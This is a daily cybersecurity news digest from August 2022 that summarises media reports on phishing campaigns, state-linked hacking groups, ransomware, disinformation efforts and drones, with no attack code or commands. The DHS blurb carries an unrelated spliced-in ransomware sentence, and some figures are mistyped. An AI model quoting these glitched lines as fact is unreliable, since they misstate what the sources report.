Daily Drop (236)
8-26-22
Friday, Aug 26, 2022 // (IG): BB //Sponsor: ShadowNews
Phishers who hit Twilio and Cloudflare stole 10k credentials from 136 others
FROM THE MEDIA: Two weeks ago, Twilio and Cloudflare detailed a phishing attack so methodical and well-orchestrated that it tricked employees from both companies into revealing their account credentials. In the case of Twilio, the attack overrode its 2FA protection and gave the threat actors access to its internal systems. Now, researchers have unearthed evidence the attacks were part of a massive phishing campaign that netted almost 10,000 account credentials belonging to 130 organizations.
READ THE STORY: arsTechnica
How 'Kimsuky' hackers ensure their malware only reach valid targets
FROM THE MEDIA: The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets in the Korean peninsula. The new safeguards implemented by Kimsuky are so effective that Kaspersky reports an inability to acquire the final payloads even after they are successfully connected to the threat actor’s command and control server.
READ THE STORY: Bleeping Computer
Microsoft Cloud Services Are Vulnerable To Nefarious Cozy Bear MFA Hacking Campaign
FROM THE MEDIA: A new report by cybersecurity firm Mandiant details an ongoing hacking campaign targeting Microsoft 365. The threat actor behind this campaign is an advanced persistent threat (APT) known as “Cozy Bear” or simply “APT29.” APT29 is thought to be a Russian hacking group sponsored by the Russian Foreign Intelligence Service (SVR). Mandiant has linked this group to the staggering SolarWinds hack of 2020, as well as many other cyberattacks on US and NATO strategic interests. APT29 has also carried out multiple attacks on these same targets at the behest of the Russian government. READ THE STORY: Hothardware
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
FROM THE MEDIA: New research indicates that over 80,000 Hikvision surveillance cameras in the world today are vulnerable to an 11 month-old command injection flaw. Hikvision – short for Hangzhou Hikvision Digital Technology – is a Chinese state-owned manufacturer of video surveillance equipment. Their customers span over 100 countries (including the United States, despite the FCC labeling Hikvision “an unacceptable risk to U.S. national security” in 2019).Tuesday. READ THE STORY: Threatpost
Microsoft: Iranian cyberespionage group likely exploiting Log4j vulnerabilities
FROM THE MEDIA: A hacking group linked to the Iranian government has been exploiting Log4j 2 vulnerabilities in SysAid, a set of popular IT support and management software applications, according to Microsoft. The company’s threat intelligence center and other components asserted with “moderate confidence” this week that the group, which they call MERCURY (also known as MuddyWater), has been exploiting Log4j vulnerabilities in SysAid servers that are running the vulnerable code. READ THE STORY: SCMAG
Hackers abuse Genshin Impact anti-cheat system to disable antivirus
FROM THE MEDIA: Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks. The driver/module, "mhypro2.sys," doesn't need the target system to have the game installed, and it can operate independently or even embedded in malware, offering the threat actors a powerful vulnerability that can disable security software. The vulnerable driver has been known since 2020 and gives access to any process/kernel memory and the ability to terminate processes using the highest privileges. READ THE STORY: Bleeping Computer // The Tech outlook
Lessons on influence operations from a hybrid war
FROM THE MEDIA: Lesson for wartime strategic communications: Influence operations are a day-in, day-out job." (Offered by Jennifer Counter, nonresident senior fellow at the Scowcroft Center’s Forward Defense practice.) Russia has not succeeded in influence operations, but Ukraine has. "The beauty of what the Ukrainians have accomplished is that a vast network of people who follow the government’s messaging lead and further spread the campaign in ways that their individual networks can understand—thus building new advocates and reinforcing Ukraine’s base of support." READ THE STORY: The Cyberwire
Kaspersky warns of more Trojan, ransomware attacks on smartphones
FROM THE MEDIA: Kaspersky on Thursday warned of more cybersecurity attacks against Android and iOS devices, with the notorious Anubis Trojan now targeting smartphones using its banking Trojan with ransomware functionalities. The global cybersecurity company detected 11.5 million malicious installation packages in the Asia-Pacific (APAC)region in the first half, more than three times the level for the entire 2021, Suguru Ishimaru, Kaspersky’s senior malware researcher in the region, told a conference here. READ THE STORY: Business World
State Department: China using artificial intelligence programs to blunt criticism of Uyghur policies
FROM THE MEDIA: China is engaged in a global influence and disinformation campaign, including the use of artificial intelligence-generated fake images, aimed at countering reports of repression against minority Uyghurs, according to a State Department report made public Wednesday. The report by the Global Engagement Center, the counter-disinformation unit, concludes that China is actively manipulating international discussion of “ongoing genocide and crimes against humanity conducted against predominantly Muslim Uyghurs and members of other ethnic and religious minority groups in the Xinjiang Uyghur Autonomous Region,” in a coordinated effort to amplify Chinese narratives that no genocide is taking place and to harass Beijing’s critics. READ THE STORY: Washington Times
Millions of Plex users may be at risk in password breach
FROM THE MEDIA: Users of home media streaming service Plex have been warned to reset their passwords immediately following a breach in which an undisclosed third party was able to make off with a user dataset that included email addresses, usernames and passwords. Service users were contacted by Plex on Wednesday 24 August after the firm discovered suspicious activity on one of its databases on 23 August. It said it believed the actual impact to have been limited, and that all accessed passwords were “hashed and secured in accordance with best practice”. READ THE STORY: Computer Weekly
Microsoft 365 business users targeted with new DocuSign phishing scam
FROM THE MEDIA: A new business email compromise (BEC) campaign has been targeting Microsoft 365 organizations in a bid to hack corporate executives’ accounts and maliciously divert business payments. Researchers from cyber security firm Mitiga found that the hackers are leveraging inherent weaknesses in 365’s multi-factor authentication (MFA), Microsoft Authenticator, as well as Microsoft 365 Identity Protection. The attacks combine spear-phishing tactics with man-in-the-middle methods to compromise email accounts. READ THE STORY: ITpro
NATO investigates hacker sale of missile firm data
FROM THE MEDIA: The data includes blueprints of weapons being used by Nato allies in the Ukraine conflict. Criminal hackers are selling the dossiers after stealing data linked to a major European weapons maker. MBDA Missile Systems admitted its data was among the stash but claimed none of the classified files belong to the firm. The pan-European company, which is headquartered in France, said its information was hacked from a compromised external hard drive, adding that it was cooperating with authorities in Italy, where the data breach took place. READ THE STORY: BBC
Twilio Hackers Targeted Over 130 Orgs in a Phishing Attack
FROM THE MEDIA: Threat actors behind the recent wave of attacks on several tech companies like MailChimp, Twilio, Klaviyo, etc., had attacked more than a hundred organizations in their campaign – says the Group-IB team. Tracking down the threat actor to someone in the USA, researchers have pointed at all the domains the hacker has used in his campaign and how they managed to breach them all. Overall, they noted about 9,931 login credentials being compromised and used for hijacking the companies. READ THE STORY: TechDator
Twitter Whistleblower Peiter Zatko Has Warned of Cyber Disasters for Decades
FROM THE MEDIA: Co-founder Jack Dorsey picked a famed ex-hacker, Peiter Zatko, to solve some of his social-media company’s most pernicious problems: protecting user privacy and the security of its computer systems. His choice was a man with near-legendary status in the industry who had been finding flaws and ways to correct them for nearly 30 years. Mr. Zatko, known as “Mudge,” is now alleging widespread dysfunction and flaws in the department he oversaw and was hired to fix. READ THE STORY: WSJ
Karakurt ransomware group targeting healthcare providers, HHS warns
FROM THE MEDIA: Provider organizations are being warned to be on the alert for cyberattacks levied by the Karakurt ransomware group after at least four cyberattacks by the threat actors against the healthcare sector in the last three months. Those observed attacks included an assisted living facility, a dental firm, a provider and a hospital. An alert from the Department of Health and Human Services Cybersecurity Coordination Center (HC3) notes that while Karakurt emerged in late 2021, their impact is heightened by their likely ties to the Conti ransomware group, either as a working relationship or as a side business of Conti. READ THE STORY: SCMAG
Meta, Twitter bust ‘deceptive’ pro-US influence campaign: report
FROM THE MEDIA: Facebook, Instagram and Twitter disrupted pro-United States covert influence operations that used “deceptive tactics” to shape opinion in Central Asia and the Middle East, according to a report by internet researchers. Dozens of fake accounts promoted pro-Western narratives while trying to discredit countries including China, Russia and Iran over a nearly five-year period, according to the report released on Wednesday by Graphika Inc and the Stanford Internet Observatory (SIO). READ THE STORY: Aljazeera
Fans heading to the World Cup in Qatar and firms involved in tournament warned about cybercrime risk
FROM THE MEDIA: Henry Wilkinson, chief intelligence officer at security intelligence firm Dragonfly, warns there will be a large increase in cybercrime targeting people and firms because of the number of people wanting to attend and travel there. He says there is already evidence of a rise in the number of efforts to scam people planning to head to the tournament, which begins in Qatar on 20 November. READ THE STORY: News Sky
FBI Springfield Office hosts cyber crime roundtable
FROM THE MEDIA: In 2021, the FBI Internet Crime Complaint Center took in 900,00 complaints with 7 billion dollars worth of losses. The state of Illinois had the fifth highest number of victims and the seventh highest monetary loss. FBI and technology safety officials met in Springfield today to discuss cyber security concerns. David Johnson is the head of the Peoria InfraGuard Satellite Chapter, a private sector partner with the FBI. He said there are two main types of threats. One is cybercrime where people are attempting to steal money and the other is nation-state threats where outside groups are attempting to infiltrate infrastructure. READ THE STORY: WANDTV
DHS shuts down disinformation board months after its efforts were paused
FROM THE MEDIA: The Department of Homeland Security has officially disbanded its controversial disinformation board, months after it was put on pause amid intense Republican-led backlash. In May, the department's "Disinformation Governance Board" initiative was halted after weeks of attacks, including those aimed at the disinformation expert appointed to lead the effort. The board was intended to coordinate department activities related to disinformation aimed at the US population and infrastructure. On Wednesday, it was formally terminated.users to access, then demands a ransom payment in bitcoin in order to decrypt them. READ THE STORY: FOX40
Google to roll out anti-disinformation campaign in some EU countries
FROM THE MEDIA: Google’s Jigsaw subsidiary will launch a campaign next week to tackle disinformation in Poland, Slovakia and the Czech Republic about Ukrainian refugees based on research by psychologists at two British universities. Working with Jigsaw, the psychologists from the universities of Cambridge and Bristol have produced 90-second clips designed to "inoculate" people against harmful content on social media. The clips, which will run in advertising slots on Google’s YouTube and also on other platforms such as Twitter (TWTR.N), TikTok and Meta’s (META.O) Facebook, aim to help people identify emotional manipulation and scapegoating in a news headline.
READ THE STORY: Dunya
DJI Unveils DJI Avata, The Ultimate Immersive Drone Experience
FROM THE MEDIA: DJI, the world’s leader in civilian drones and creative camera technology, today introduces DJI Avata, a transformational new drone that offers an unparalleled experience of immersive flight. DJI Avata creates a new paradigm for first-person view (FPV) drone flight, allowing every pilot to race through the skies and feel its astonishing performance, agility, and easy control. Coupled with the new DJI Goggles 2 and the intuitive DJI Motion Controller, DJI Avata delivers a flight experience that was unimaginable until now. READ THE STORY: UASWEEKLY
With Iranian drones, Russia complicates nuclear deal talks
FROM THE MEDIA: Russia has obtained hundreds of Iranian drones capable of being used in its war against Ukraine despite U.S. warnings to Tehran not to ship them, according to Western intelligence officials. It’s unclear whether Russia has begun flying the drones against Ukrainian targets, but the drones appear to be operational and ready to use, said the officials, who spoke on condition of anonymity to discuss sensitive intelligence. The reported shipment marks the latest sign of what appears to be closer military cooperation between the longtime allies.
READ THE STORY: The Washington Post
Cybercrime Groups Increasingly Adopting Sliver Command-and-Control Framework
FROM THE MEDIA: Nation-state threat actors are increasingly adopting and integrating the Sliver command-and-control (C2) framework in their intrusion campaigns as a replacement for Cobalt Strike. "Given Cobalt Strike's popularity as an attack tool, defenses against it have also improved over time," Microsoft security experts said. "Sliver thus presents an attractive alternative for actors looking for a lesser-known toolset with a low barrier for entry." Sliver, first made public in late 2019 by cybersecurity company BishopFox, is a Go-based open source C2 platform that supports user-developed extensions, custom implant generation, and other commandeering options. READ THE STORY: THN
Preventing attacks on mobile applications in the enterprise
FROM THE MEDIA: The use of mobile devices within enterprise organizations is commonplace, so organizations must prepare for all sorts of mobile threat vectors -- including attacks via mobile applications -- to avoid a cybersecurity breach. As the COVID-19 pandemic and the trend of working from anywhere have pushed many people to work remotely, mobile devices have become a primary channel for employees to stay in touch with their employers and enterprise networks. READ THE STORY: TechTarget
Cyberattack Raises Pressure on European Water Providers During Drought
FROM THE MEDIA: A cyberattack on a British company that supplies drinking water to 1.6 million customers has raised security concerns about the vulnerability of such utilities across drought-stricken Europe. South Staffordshire PLC said last week that its information-technology systems were hit by a cyberattack but it didn’t affect the company’s ability to provide safe drinking water to customers. A ransomware group known as Cl0p took responsibility for the attack and published online some data it said it stole from the company. The company didn’t respond to requests for comment. READ THE STORY: WSJ
India - Anti-Drone Doctrine And Countering Drones
FROM THE MEDIA: Drones have emerged as effective tools of modern warfare, whether in insurgency environments or actual war . On July 31 , a US drone fired two Hell fire missiles, from a distance of 1850 Kms. to Kill Al Quaeda Chief , Ayman Al Zawahiri in Kabul . Earlier , in a similar targeted attack, on 3 January 2020, Qasem Soleimani, an Iranian major general, was killed by a U.S. drone strike at Baghdad International Airport. It means drones can pick pin-point targets and neutralise them . Note that the drones have fired their missiles from “ Stand off” distances. Some years back Yemen Houthi rebels had used Drones to attack two Saudi Oil fields. READ THE STORY: Mission Victory India
Items of interest
Ukraine’s volunteer ‘IT army’ responds to Russian hackers, minister says
FROM THE MEDIA: The largest power producer in Ukraine, which operates four nuclear power plants, last week survived what officials described as the most powerful attack on Ukraine by Russia hackers since the end of February. According to the Ukrainian nuclear agency, Energoatom, the attack did not cause any harm.
At the same time, Ukrainians are hitting back at Russian digital infrastructure. In Russia, more than 600 online resources including the federal postal service, pension fund, online banking and video conference platforms were affected by Ukrainian hackers in this month, according to a statement by the Ministry of Digital Transformation of Ukraine.
“Cyberspace is a frontline of the 21st century, and victories there are as important as in actual battlefields,” Mykhailo Fedorov, the minister of Digital Transformation of Ukraine, told ABC News.
He’s responsible for establishing the so-called “IT army” — a gathering of more than 230,000 anonymous volunteers who are working together via Telegram, an online messaging platform.
Russia’s assault on Ukraine has extended into the virtual domain as well as on real-life battlegrounds. And here the enemy is choosing very sensitive targets that could impact security for Ukraine, Europe and even the world.
But Fedorov said his country’s cyber security system was more than efficient.
“None out of over 800 cyberattacks since February 24 caused real losses for the Ukrainian economy, stopped the banking system or damaged critical infrastructure,” he said.
READ THE STORY: DeltaPlex News
Developing Ethical Hacking Tools with Python (Video)
FROM THE MEDIA: Developing Ethical Hacking Tools with Python (Lesson 1 of 5) | Introduction | Cybrary.
Ethical Hacking using Python | Password Cracker Using Python (Video)
FROM THE MEDIA: Ethical Hacking using Python | Password Cracker Using Python.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com